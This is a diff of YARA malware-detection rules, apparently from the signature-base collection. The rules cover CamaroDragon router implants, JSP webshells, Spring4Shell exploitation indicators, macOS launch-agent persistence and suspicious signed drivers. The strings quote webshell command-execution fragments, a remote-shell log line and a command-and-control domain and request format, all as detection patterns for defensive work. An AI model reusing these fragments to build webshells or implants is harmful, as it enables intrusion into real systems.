 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "01e4f7b1c9c068f3953fa58749a14ea148d2b038c7266da789e0998eae83e1a7"
+		hash = "4288a81779a492b5b02bad6e90b2fa6212fa5f8ee87cc5ec9286ab523fc02446 cec7be2126d388707907b4f9d681121fd1e3ca9f828c029b02340ab1331a5524 e1cf136be50c4486ae8f5e408af80b90229f3027511b4beed69495a042af95be"
+		logic_hash = "2613fcb32cbdbb24df6c48fcb5d16549783e50246d2cdb8c473375644dd88254"
 		score = 75
-		quality = 85
-		tags = "HIGHVOL, CVE-2017-10271, FILE"
-		hash1 = "376c2bc11d4c366ad4f6fecffc0bea8b195e680b4c52a48d85a8d3f9fab01c95"
-		hash2 = "7d5819a2ea62376e24f0dd3cf5466d97bbbf4f5f730eb9302307154b363967ea"
-		hash3 = "864e9d8904941fae90ddd10eb03d998f85707dc2faff80cba2e365a64e830e1d/subfile"
-		hash4 = "2a69e46094d0fef2b3ffcab73086c16a10b517f58e0c1f743ece4f246889962b"
+		quality = 83
+		tags = "FILE"
 
 	strings:
-		$s1 = "<soapenv:Header"
-		$s2 = "java.beans.XMLDecoder"
-		$s3 = "void" fullword
-		$s4 = "index="
-		$s5 = "/array>"
-		$s6 = "\"start\""
-		$s7 = "work:WorkContext" nocase
+		$h1 = "#!/usr/bin/env python"
+		$s_1 = "<plist" ascii fullword
+		$s_2 = "ProgramArguments" ascii fullword
+		$s_3 = "Library" ascii fullword
+		$sinterval_1 = "StartInterval" ascii fullword
+		$sinterval_2 = "RunAtLoad" ascii fullword
+		$e_1 = /(AHAAbABpAHMAdA|cGxpc3|PABwAGwAaQBzAHQA|PHBsaXN0|wAcABsAGkAcwB0A|xwbGlzd)/ ascii
+		$e_2 = /(AAcgBvAGcAcgBhAG0AQQByAGcAdQBtAGUAbgB0AHMA|AHIAbwBnAHIAYQBtAEEAcgBnAHUAbQBlAG4AdABzA|Byb2dyYW1Bcmd1bWVudH|cm9ncmFtQXJndW1lbnRz|UAByAG8AZwByAGEAbQBBAHIAZwB1AG0AZQBuAHQAcw|UHJvZ3JhbUFyZ3VtZW50c)/ ascii
+		$e_4 = /(AGkAYgByAGEAcgB5A|aWJyYXJ5|TABpAGIAcgBhAHIAeQ|TGlicmFye|wAaQBiAHIAYQByAHkA|xpYnJhcn)/ ascii
+		$einterval_a = /(AHQAYQByAHQASQBuAHQAZQByAHYAYQBsA|dGFydEludGVydmFs|MAdABhAHIAdABJAG4AdABlAHIAdgBhAGwA|N0YXJ0SW50ZXJ2YW|U3RhcnRJbnRlcnZhb|UwB0AGEAcgB0AEkAbgB0AGUAcgB2AGEAbA)/ ascii
+		$einterval_b = /(AHUAbgBBAHQATABvAGEAZA|dW5BdExvYW|IAdQBuAEEAdABMAG8AYQBkA|J1bkF0TG9hZ|UgB1AG4AQQB0AEwAbwBhAGQA|UnVuQXRMb2Fk)/ ascii
 
 	condition:
-		filesize < 10KB and ( uint32( 0 ) == 0x616f733c or uint32( 0 ) == 0x54534f50 ) and all of ( $s* )
+		uint32( 0 ) == 0x752f2123 and $h1 at 0 and filesize < 120KB and ( ( all of ( $s_* ) and 1 of ( $sinterval* ) ) or ( all of ( $e_* ) and 1 of ( $einterval* ) ) )
 }
-rule SIGNATURE_BASE_HKTL_Venom_LIB_Dec22 : FILE
+rule SIGNATURE_BASE_MAL_LNX_Camarodragon_Sheel_Oct23 : FILE
 {
 	meta:
-		description = "Detects Venom - a library that meant to perform evasive communication using stolen browser socket"
-		author = "Ido Veltzman, Florian Roth"
-		id = "b13b8a9c-52a4-53ac-817e-9f729fbf17c2"
-		date = "2022-12-17"
+		description = "Detects CamaroDragon's tool named sheel"
+		author = "Florian Roth"
+		id = "f6f08c0e-236c-5194-9369-da8fdef4aa21"
+		date = "2023-10-06"
 		modified = "2023-12-05"
-		reference = "https://github.com/Idov31/Venom"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_hktl_venom_lib.yar#L2-L30"
+		reference = "https://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_camaro_dragon_oct23.yar#L2-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fa143946479a45b272d507c3aa2b17026bfdcbb4abefd833f95ff78537568ec1"
-		score = 75
+		logic_hash = "b06f645b766a099adb71c144bdced70c130735e75d5be6451f71077c7d3a5d19"
+		score = 85
 		quality = 85
 		tags = "FILE"
+		hash1 = "7985f992dcc6fcce76ee2892700c8538af075bd991625156bf2482dbfebd5a5a"
 
 	strings:
-		$x1 = "[ + ] Created detached hidden msedge process: " fullword ascii
-		$ss1 = "WS2_32.dll" fullword ascii
-		$ss2 = "WSASocketW" fullword ascii
-		$ss3 = "WSADuplicateSocketW" fullword ascii
-		$ss5 = "\\Device\\Afd" wide fullword
-		$sx1 = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe --no-startup-window" fullword wide
-		$sx2 = "[ + ] Data sent!" fullword ascii
-		$sx3 = "[ + ] Socket obtained!" fullword ascii
-		$op1 = { 4c 8b f0 48 3b c1 48 b8 ff ff ff ff ff ff ff 7f }
-		$op2 = { 48 8b cf e8 1c 34 00 00 48 8b 5c 24 30 48 8b c7 }
-		$op3 = { 48 8b da 48 8b f9 45 33 f6 48 85 c9 0f 84 34 01 }
+		$x1 = "-h server_ip -p server_port -i update_index[0-4] [-r]" ascii fullword
+		$s1 = "read_ip" ascii fullword
+		$s2 = "open fail.%m" ascii fullword
+		$s3 = "ri:h:p:" ascii fullword
+		$s4 = "update server list success!" ascii fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( ( 3 of ( $ss* ) and all of ( $op* ) ) or 2 of ( $sx* ) ) or $x1 or all of ( $sx* )
+		uint16( 0 ) == 0x457f and filesize < 30KB and ( 1 of ( $x* ) or 3 of them ) or 4 of them
 }
-
-rule SIGNATURE_BASE_SUSP_Unsigned_OSPPSVC : FILE
+rule SIGNATURE_BASE_MAL_LNX_Camarodragon_Horseshell_Oct23 : FILE
 {
 	meta:
-		description = "Detects a suspicious unsigned office software protection platform service binary"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0e312237-0c82-59da-b62d-56065c6075f0"
-		date = "2019-09-26"
+		description = "Detects CamaroDragon's HorseShell implant for routers"
+		author = "Florian Roth"
+		id = "9e54745f-146f-50a6-b30f-53aaaa6907b5"
+		date = "2023-10-06"
 		modified = "2023-12-05"
-		reference = "https://www.welivesecurity.com/2019/09/24/no-summer-vacations-zebrocy/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_sign_anomalies.yar#L4-L25"
+		reference = "https://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_camaro_dragon_oct23.yar#L27-L56"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "27d8d8d19e25a2e3cffb765a0b3122e38dcb72d60c00c554163ee193a04b3d82"
-		score = 65
+		logic_hash = "73adaa286b345cffd35e6ba017b3204d8818dcaeea8a48ca93959566461ac3ca"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		hash1 = "5294a730f1f0a176583b9ca2b988b3f5ec65dad8c6ebe556b5135566f2c16a56"
+		hash1 = "998788472cb1502c03675a15a9f09b12f3877a5aeb687f891458a414b8e0d66c"
 
 	strings:
-		$sc1 = { 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63
-               00 72 00 69 00 70 00 74 00 69 00 6F 00 6E 00 00
-               00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F
-               00 66 00 74 00 20 00 4F 00 66 00 66 00 69 00 63
-               00 65 00 20 00 53 00 6F 00 66 00 74 00 77 00 61
-               00 72 00 65 00 20 00 50 00 72 00 6F 00 74 00 65
-               00 63 00 74 00 69 00 6F 00 6E 00 20 00 50 00 6C
-               00 61 00 74 00 66 00 6F 00 72 00 6D 00 20 00 53
-               00 65 00 72 00 76 00 69 00 63 00 65 }
+		$x1 = "echo \"start shell '%s' failed!\" > .remote_shell.log" ascii fullword
+		$x2 = "*****recv NET_REQ_HORSE_SHELL REQ_CONNECT_PORT*****" ascii fullword
+		$s1 = "m.cremessage.com" ascii fullword
+		$s2 = "POST http://%s/index.php HTTP/1.1" ascii fullword
+		$s3 = "wzsw_encrypt_buf" ascii fullword
+		$s4 = "body:%d-%s" ascii fullword
+		$s5 = "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident" ascii fullword
+		$s6 = "process_http_read_events" ascii fullword
+		$op1 = { c4 34 42 00 02 30 63 00 40 10 60 00 09 ae 62 00 48 8e 62 00 cc }
+		$op2 = { 27 f4 8c 46 27 f0 03 20 f8 09 00 60 28 21 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 8000KB and $sc1 and pe.number_of_signatures < 1
+		uint16( 0 ) == 0x457f and filesize < 600KB and ( 1 of ( $x* ) or 3 of them ) or 5 of them
 }
-rule SIGNATURE_BASE_SUSP_PE_Signed_By_Suspicious_Entitiy_Mar23 : FILE
+rule SIGNATURE_BASE_WEBSHELL_JSP_Nov21_1 : FILE
 {
 	meta:
-		description = "Find driver signed by suspicious company (see references)"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "13151f9b-22cb-551f-81b4-a60a301f0bfc"
-		date = "2023-03-06"
-		modified = "2023-12-05"
-		reference = "https://www.sentinelone.com/labs/driving-through-defenses-targeted-attacks-leverage-signed-malicious-microsoft-drivers/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_sign_anomalies.yar#L28-L214"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2fb7a38e69a88e3da8fece4c6a1a81842c1be6ae9d6ac299afa4aef4eb55fd4b"
-		hash = "9a24befcc0c0926abb49d43174fe25c2469cca06d6ab3b5000d7c9d434c42fe9"
-		hash = "9ad716f0173489e74fefe086000dfbea9dc093b1c3460bed9cdb82f923073806"
-		hash = "a007c8c6c1aecfff1065429fef691e7ae1c0ce20012a113f01ac57c61564a627"
-		hash = "fbe82a21939d04735aa3bbf23fbabd45ac491a143396e8e62ee20509c1257918"
-		hash = "d12c6ea0a86c58ea2d80d1dc9b793ba28a0db92c72bb5b6f4ee2b800fe42091b"
-		hash = "4cf31d000f1542690cbc0ace41e4166651a71747978dc408e3cce32e82713917"
-		hash = "e1adaea335b20d4d2e351f7bea496cd40cb379376900434866db342f851d9ddf"
-		hash = "031408cf2f2c282bcc05066356fcc2bb862b7e3c504ab7ffb0220bea341404a5"
-		hash = "2f13d4e1bd35f6c0ad0978af19006c17193cf3d42b71cba763cca68f7e9d7fca"
-		hash = "cb40a5dc4f6a27b1dc50176770026b827f8baa05fa95a98a4e880652f6729d96"
-		hash = "a7591b7384bd10eb934f0dac8dcbfdff8c352eba2309f4d75553567fa2376efa"
-		hash = "d517ce5f132b3274f0b9783a5b0c37d1d648e6079874960af24ca764b011c042"
-		hash = "aeec903013d5b66f0ae1c6fa50bb892759149c1cec86db8089a4e60482e02250"
-		hash = "0d22828724cb7fbc6cef7f98665d020867d2eb801cff2c21f2e97e481040499b"
-		hash = "4b2e874d51d332fd840dadd463a393f9f019de46e49de73be910b9b1365e4e4e"
-		hash = "3839c0925acf836238ba9a0c5798b84b1c089a8353cc27ae7e6b75d273b539e3"
-		hash = "c470f519fb0d4a2862035e0d9e105a0a6918adc51842b12ad14b5b5f34879963"
-		hash = "cc6d174bc86f84f5a4c516e9c04947e2fecc0509a84748ea80576aeee5950aed"
-		hash = "6fe8df70254f9b5f53452815f0163cb2ffb2d7f0f5aefbb9b149ad1be9284e31"
-		hash = "4cde473fb68fa9b2709ea8a23349cd2fce8b8b3991b9fea12f95d12292b8aa7a"
-		hash = "e2c40c8dd60bb395807c39c76bfdf5cd158ebefd2a47ad3306a96662c50057c0"
-		hash = "9c12b09b529fa517eaeb49df22527d7563b5432d62776166048d97f83b2dce5c"
-		hash = "5a4e17287f3dceb5bf1ed411e5fdd7e8692aebf2a19b334327733fc1c158b0ba"
-		hash = "c42964aa7fa354b1a285bdbcbd9e84b6bdd8813ff9361955e0e455d032803cce"
-		hash = "ffd6955bf40957a35901d82fd5b96d0cb191b651d3eca7afa779eebfed0d9f7e"
-		hash = "f6874335eb0d611d47b2ec99a6b70f7b373a50d8d1f62d290b06174f42279f36"
-		hash = "4e6d7fd70a143f19429fead2c14779aea9d9140e270bb9e91e47fa601643e40e"
-		hash = "7b0e4aae37660b1099de69f4c14f5d976f260c64a4af8495ff1415512a6268ba"
-		hash = "db45cbfb094f3e1ebf1cb3880087a24d4e771cc43ba48ad373e6283cbe7391da"
-		hash = "813edc804f59a97ec9391ea0db4b779443bd8daf1e64c622b5e3c9a22ee9c2e0"
-		hash = "8d66a4b7c2ae468390d32e5e70b3f9b7cb796b54b7c404cde038de9786be8d1d"
-		hash = "85936141f0f32cf8f3173655e7200236d1fce6ef9c2616fd2b19ae7951c644c5"
-		hash = "b5fc0cc9980fc594a18682d2b0d5b0d0f19ba7a35d35106693a78f4aaba346ac"
-		hash = "7aae36c5ffa8baaab19724dae051673ddafd36107cb61c505926bfceaadcd516"
-		hash = "5d0228a0d321e2ddac5502da04ca7a2b2744f3dc1382daa5f02faa9da5aface1"
-		hash = "2af1ac8bc8ae8d7cad703d2695f2f6c6d79b82eebba01253a8ec527e11e83fcd"
-		hash = "c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497"
-		hash = "0e339c9c8a6702b32ee9f2915512cbeb3391ced74b16c7e0aed9b1a80c9e58c8"
-		hash = "80bdeaa4f162c65722b700e4ffba31701d0d634f5533e59bf3885dc67ee92f3f"
-		hash = "4570f64f2000bdaf53aec0fc2214c8bd54e0f5cb75987cdf1f8bda6ea5fc4c43"
-		hash = "a9c906bde6c8a693d5d46c9922dafa2dfd2dec0fff554f3f6a953c2e36d3f7b7"
-		hash = "520df3ddd7c9ecdeecac8e443d75ac258c26b45d37ecec22501afdda797f6a0a"
-		hash = "4d3e0f27a7bcfd4b442b489c63641af22285ca41c6d56ac1db734196ab10b315"
-		hash = "5000b3b1d593ba40cc10098644af1551259590ac67d3726fab2be87aad460877"
-		hash = "7c27bd6104fc67dd16e655f3bf67c2abd8b5bf2a693ba714ac86904c5765b316"
-		hash = "34b1234eab7ff10edde9e09ecf73c5e4bfe9ee047ccfdb43de1e1f6155afad0c"
-		hash = "f6fe2cc9ea31f85273c26e84422137df21cfce4b9e972b0db94fe3a67b54f6ca"
-		hash = "ec4d0828196926bd36325f4b021895d37cfaaa024f754b36618c78b2574f0122"
-		hash = "2a89f263d85da8fb0c934d287b5b524744479741491c740aaa46ac9f694f6d1b"
-		hash = "c8d0122974fc10a7d82c62f3e6573a94379c026dd741fd73497afdf36d3929be"
-		hash = "0345f71876bc4c888deadba7284565a8da112901f343e54b8522279968abd1b2"
-		hash = "6c0e10650be9e795dc6adfbe8aad8c1c3a8657e4c45cb82a7d5188ee24021ca0"
-		hash = "90b8d9c4ff3e4e0a0342e0d91da3a25be2fead29f3b32888bb35f8575845259d"
-		hash = "0310400c9e62c3fe08dc6506313e26f7c5c89035c81b0141ce57543910c1c42e"
-		hash = "b0da0316443f878aad0b3d9764b631d5df60e119ab59324c37640da1b431893a"
-		hash = "cc4bd06f27a5f266bc8825a08e5f45dcaa4352eb6d69214b5037d28cc8de6908"
-		hash = "2d4b7c6931203923db9a07e1ac92124e799f3747ab20e95e191e99c7b98f3fbd"
-		hash = "b5965de0d883fd0602037f3dc26fd4461e6328612f1a34798cff0066142e13c4"
-		hash = "86ce17183ddf32379db53ecaedefe0811252165b05cd326025bb8eca2e6a25d7"
-		hash = "6edca16d5aa751aa4c212e6477121d51e4d9b9432896d25b41938a27a554bbe7"
-		hash = "cdd8966e0cf08a6578e34de7498a44413a6adabae04d81ef3129f26305966db2"
-		hash = "df890974589ed2435f53b8c8f147a06752f1b37404afd4431362c1938fcb451e"
-		hash = "3e05d8abaaa95af359e5b09efb30546d0aa693859ebc8a0970a2641556ea644c"
-		hash = "1c8ddf4b9c99c8f1945abf1527c7fa93141430680ac156a405d9a927d32f3b5e"
-		hash = "5d2ed5930ab1a650f9fb9293f49a9f35737139fdfa9f14e46a07e5d4d721ae3e"
-		hash = "18834de3e4844a418970c2184cc78c2d7cb61d18e9f7c7c0e88e994b4212edc5"
-		hash = "a6b6fc94d8e582059af0fe30c2c93c687fccd5a0073a6a26a2cd097ea96adc7c"
-		hash = "28b40fa160c915f13f046d36725c055d6c827a4d28674ea33c75a9b410321290"
-		hash = "efab0fbf77dc67a792efd1fe2b3f46bbdfdee30a9321acc189c53a6c5e90f05c"
-		hash = "348781221d1a2886923de089d1b7b12c32cfdd38628b71203da925b5736561e9"
-		hash = "a1a5f410e6eab2445d64bfcd742fe1a802a0a2d9af45c7ab398f84894dd5dc3d"
-		hash = "9de05ce0d9e9de05ebdc2859a5156f044f98bb180723f427a779d36b1913e5d3"
-		hash = "eeff7e85c50a7f11fc8a99f7048953719fb1d2a6451161a0796eac43119ece21"
-		hash = "383cc025800a3b3d089f7697e78fe4d5695a8d1ee26dcad0b0956ad6800ccae4"
-		hash = "41be6f393cea4d8d5869fff526c4d75ec66c855f7e9c176042c39b9682ea9c14"
-		hash = "71552e65433c8bbf14e5bcbc35a708bc10d6fded740c5f4783edce84aea4aabf"
-		hash = "3c1b3e8666b58a78c70f36ed557c7ecc52e84457e87e5884b42e5cd9e8c1a303"
-		hash = "4288d7113031151a2636a164c0dc6fce78c86f322271afec9ef2d4b54494c334"
-		hash = "f73a39332be393a9bc23ec27ff6d025bc90d7320dde97f37cc585ecf6c0436a2"
-		hash = "018f5103635992aa9ddc1c46cafe2b7ba659fcfbc8f8ab29dcea28e155b033ee"
-		hash = "fe650fc138dcfbbd4ab6aa5718bf3cd36f50898ae19d3aceaa12f7d4f39d0b43"
-		hash = "fa21b39cd5a24ba35433e90cae486454b7400b50e7f7f5c190fdbec6704b4352"
-		hash = "3dd36c798cc89bfad7cdbf58d7da90ba113fe043ca46bdbcab7ae7fb9dc2f42b"
-		hash = "674f4444f0de5c81c766c376a65fbdf1f7116228a61c71ffb504995c9e160183"
-		hash = "cd3d25b2842bb2d6a5580f72e819acd344ce7f3a2478fb6d53ff668ad6531228"
-		hash = "1668f4eb8a85914db46ff308b9f8a5040a024acc93259dfc004ea2b80ab6bcf1"
-		hash = "4f31cab6c011b79bf862bb6acea3086308b0576afe33affdb09039c97e723beb"
-		hash = "6b0ff48b8113076d2875edb7bea7f120b7b9d9a990ae296a5b5a95660ae7edfc"
-		hash = "956a00dd6382e83d3f7490378ae98e4fc8d9b8ec2cd549519f007091e3ccce1f"
-		hash = "8c7f938cf55728d8d41a7fa6b9953c4f81cf05ed3d7b7435ec8999e130257f7f"
-		hash = "427ee4d4d18fc0c1196326215e94947f7d8c03794de36d0127231690bf5bf3c0"
-		hash = "b6f3ece5bf7b9f6ecf99104d3c76b9007106fad98d20500956dd1e42d4ec5e8d"
-		hash = "47a0ad6150c5a1de4c788827662a9cafbd2816a7d32be2028721e49a464acbed"
-		hash = "8743ac81384fd10c0459f3574489d626e13c95dd73274dcf1d872bcd3630b9e8"
-		hash = "a1755415a12f85bea3f65807860f902cf41e56b0ab2c155ac742af3166ef1dfd"
-		hash = "3f5a91500bfade2d9708e1fbe76ae81dacdb7b0f65f335fee598546ccfc267e3"
-		hash = "5be43b773dbde6542d6a0d53cd6616ea95a49dd38659edc6ba0d580a0d9777ab"
-		hash = "90e080a63916c768b0b65787fe5695fd903d44e1b0b688d06c14988ba30b5ea7"
-		hash = "d1184ee3f26919b8f5a4b1a6d089f14e79e0c89260590156111f72a979c8e446"
-		hash = "c13ddd2bafcfdfc00fb5cb87d8eb533ae094b0dd5784df77c98bddeac9d72725"
-		hash = "9bb3035610bd09ba769c0335f23f98dd85c2f32351cdd907d4761b41ab5d099c"
-		hash = "1703025c4aed71d0ca29a3cd0e15047c24cc9adbb5239765f63e205ef7d65753"
-		hash = "948d47b9386b2b3247b7e9796ab2f2078889264559ad04ccd9362b03dbbf8534"
-		hash = "edd527d978b591d146d24d075bb4c24177e0eca6a27b5d92f35be68635cc3767"
-		hash = "c642dc125fbd83e004d2c527933996589e0fcad06313a5a56679a265b8966529"
-		hash = "cfa3a48bf0c683834d1d198a653ebced8a8faae9d0cbb38f3e859b45da81d554"
-		hash = "bb8f5d123aebdde5542724db5be8430d62a80f86f590a272aac9087d097f395c"
-		hash = "e41e10673db41b13ba17c828beb94fc39e8d3aa43b01f9fe437a2f6e0b8ae443"
-		hash = "a132e31db9f9761d6bd2c375415e615bb0a548fb02c4fd6373e9f7d1568de1dc"
-		hash = "5084c6e20b88adeea6a28508cf172048d7cf20adeaa52abdd361fc2207411055"
-		hash = "525320e3631a23a3286481710533ba15cd6268ee10be98962a55e2afead1ffbf"
-		hash = "16c74f288f4f929e74cd8e16443303aec3a64cfef64aabc14553f4c1e58c9ede"
-		hash = "4b482ebf88bcb55e7b0769690ccca4d08856c879af82ad7165436b82a315d742"
-		hash = "79c9acadd99ab1251dbba3bff7d0b67de4252f913f485465d63f4f0c4d9a6419"
-		hash = "9bcc3f36c32e3efbf8bdcba7670658042db65dd617dad0709d92c554ba841b57"
-		hash = "5654ed1205de6860e66383a27231e4ac2bb7639b07504121d313a8503ece3305"
-		hash = "5d1e3c495d08982459b4bd4fd2ab073ed2078fce9347627718a7c25adee152e9"
-		hash = "458702ae1b2ef8a113344be76af185ee137b7aac3646ece626d2eeeadcc9e003"
-		hash = "2c703e562a6266175379fa48f06f58aab109dbe56e0cde24b4b0db5f22f810a3"
-		hash = "49faf70c0978c21a68bc8395cf326f50c491e379f55b5df7d17f0af953861ece"
-		hash = "a2b16bbef0a7cb545597828466cd13225efaba6e7006bfbf59040bbff54c463c"
-		hash = "b08449d42f140c7e4d070c5f81ce7509f48282a5bb0e06948b7ed65053696a37"
-		hash = "c1633ad8c9e6c2b4cc23578655fc6cf5cd0122cfd24395d1551af1d092f89db2"
-		hash = "01f42f949a37d9d479b8021f27dcf0d0e6f0b0b6cd2e0883c6b4b494f0a1d32a"
-		hash = "4943d53a38ac123ed7c04ad44742a67ea06bb54ea02fa241d9c4ebadab4cb99a"
-		hash = "597ce12c9fbecc71299ba6fc3e4df36cc49222878d0e080c4c35bbfdffd30083"
-		hash = "0265fbd9cfc27c26c42374fce7cf0ef11f38e086308d51648b45f040d767c51d"
-		hash = "0dc92a1a6fd27144b3e35a9900038653892d25c2db8ede8b9e0aee04839f165a"
-		hash = "682582c324cb1eafacf80090f6108c1580fee12dbfdfe8b51771d429fdcce718"
-		hash = "e9e6f6e22b5924f80164fbad45be28299e9ec0bd2f404551b6ca772509a7135a"
-		hash = "a8db750f82906fb9cf9fb371ec65be76275d9b81b95e351fcb3db4ef345884ab"
-		hash = "e900b4016177259d07011139a55c0571c1e824fb7e9dddc11df493b3c8209173"
-		hash = "f8a7a26d51a5e938325deee86cbf5aa8263d3a50818c15d5a395b98658630c18"
-		hash = "861b87fc6c4758cfe1e26c7a038cffb64054ad633b7ea81319c9a98b7b49df0d"
-		hash = "848fdb491307ed7b002dbdf99796df2b286d53b2e0066d78f3554f2f38a2c438"
-		hash = "4b0c05bc33c9e7d0ed2d97dbefb6292469b9d74d650d5cfb2691345a11c0f54a"
-		hash = "948d47b9386b2b3247b7e9796ab2f2078889264559ad04ccd9362b03dbbf8534"
-		hash = "edd527d978b591d146d24d075bb4c24177e0eca6a27b5d92f35be68635cc3767"
-		hash = "c642dc125fbd83e004d2c527933996589e0fcad06313a5a56679a265b8966529"
-		hash = "cfa3a48bf0c683834d1d198a653ebced8a8faae9d0cbb38f3e859b45da81d554"
-		hash = "bb8f5d123aebdde5542724db5be8430d62a80f86f590a272aac9087d097f395c"
-		hash = "e41e10673db41b13ba17c828beb94fc39e8d3aa43b01f9fe437a2f6e0b8ae443"
-		hash = "a132e31db9f9761d6bd2c375415e615bb0a548fb02c4fd6373e9f7d1568de1dc"
-		hash = "5084c6e20b88adeea6a28508cf172048d7cf20adeaa52abdd361fc2207411055"
-		hash = "525320e3631a23a3286481710533ba15cd6268ee10be98962a55e2afead1ffbf"
-		hash = "16c74f288f4f929e74cd8e16443303aec3a64cfef64aabc14553f4c1e58c9ede"
-		hash = "4b482ebf88bcb55e7b0769690ccca4d08856c879af82ad7165436b82a315d742"
-		hash = "79c9acadd99ab1251dbba3bff7d0b67de4252f913f485465d63f4f0c4d9a6419"
-		hash = "9bcc3f36c32e3efbf8bdcba7670658042db65dd617dad0709d92c554ba841b57"
-		logic_hash = "68c3f2c97a8eab3d334222eae4c4b808e6b763896f198d033f4d11218e9ff551"
-		score = 60
+		description = "Detects JSP webshells"
+		author = "Florian Roth (Nextron Systems)"
+		id = "117eed28-c44e-5983-b4c7-b555fc06d923"
+		date = "2021-11-23"
+		modified = "2023-12-05"
+		reference = "https://www.ic3.gov/Media/News/2021/211117-2.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_spring4shell.yar#L2-L17"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		logic_hash = "1dac7706421961c71ba6f8d7a223b80e4b77bf206bfb64ee18c7cc894b062a3c"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License"
 
 	strings:
-		$cert1 = "91210242MA0YGH36" wide ascii
-		$cert2 = "Copyright (C) 2013-2021 QuickZip. All rights reserved." wide ascii
-		$cert3 = "Qi Lijun" wide ascii
-		$cert4 = {51 00 69 00 20 00 4c 00 69 00 6a 00 75 00 6e}
-		$cert5 = "Luck Bigger Technology Co., Ltd" wide ascii
-		$cert6 = {4c 00 75 00 63 00 6b 00 20 00 42 00 69 00 67 00 67 00 65 00 72 00 20 00 54 00 65 00 63 00 68 00 6e 00 6f 00 6c 00 6f 00 67 00 79 00 20 00 43 00 6f 00 2e 00 2c 00 20 00 4c 00 74 00 64 }
-		$cert7 = "XinSing Network Service Co., Ltd" wide ascii
-		$cert8 = "Hangzhou Shunwang Technology Co.,Ltd" wide ascii
-		$cert9 = "Zhuhai liancheng Technology Co., Ltd." wide ascii
-		$cert10 = { e5 a4 a7 e8 bf 9e e7 ba b5 e6 a2 a6 e7 bd 91 e7 bb 9c e7 a7 91 e6 8a 80 e6 9c 89 e9 99 90 e5 85 ac e5 8f b8 }
-		$cert11 = { e5 8c 97 e4 ba ac e5 bc 98 e9 81 93 e9 95 bf e5 85 b4 e5 9b bd e9 99 85 e8 b4 b8 e6 98 93 e6 9c 89 e9 99 90 e5 85 ac e5 8f b8 }
-		$cert12 = { e7 a6 8f e5 bb ba e5 a5 a5 e5 88 9b e4 ba 92 e5 a8 b1 e7 a7 91 e6 8a 80 e6 9c 89 e9 99 90 e5 85 ac e5 8f b8 }
-		$cert13 = { e5 8e a6 e9 97 a8 e6 81 92 e4 bf a1 e5 8d 93 e8 b6 8a e7 bd 91 e7 bb 9c e7 a7 91 e6 8a 80 e6 9c 89 e9 99 90 e5 85 ac e5 8f b8 0a }
-		$cert14 = { e5 a4 a7 e8 bf 9e e7 ba b5 e6 a2 a6 e7 bd 91 e7 bb 9c e7 a7 91 e6 8a 80 e6 9c 89 e9 99 90 e5 85 ac e5 8f b8 }
+		$x1 = "request.getParameter(\"pwd\")" ascii
+		$x2 = "excuteCmd(request.getParameter(" ascii
+		$x3 = "getRuntime().exec (request.getParameter(" ascii
+		$x4 = "private static final String PW = \"whoami\"" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 20MB and any of ( $cert* )
+		filesize < 400KB and 1 of them
 }
-rule SIGNATURE_BASE_APT_Webshell_Tiny_1 : FILE
+rule SIGNATURE_BASE_EXPL_POC_Springcore_0Day_Indicators_Mar22_1
 {
 	meta:
-		description = "Detetcs a tiny webshell involved in the Australian Parliament House network compromise"
+		description = "Detects indicators found after SpringCore exploitation attempts and in the POC script"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e65a8920-0684-5aae-a2b8-079c2beae08a"
-		date = "2019-02-18"
+		id = "297e4b57-f831-56e0-a391-1ffbc9a4d438"
+		date = "2022-03-30"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/cyb3rops/status/1097423665472376832"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_aus_parl_compromise.yar#L12-L23"
+		reference = "https://twitter.com/vxunderground/status/1509170582469943303"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_spring4shell.yar#L19-L34"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "277162f720195c94d36fd3350d0dda785007e8cc6ed2ab2aa1a6a6262f2993fa"
-		score = 75
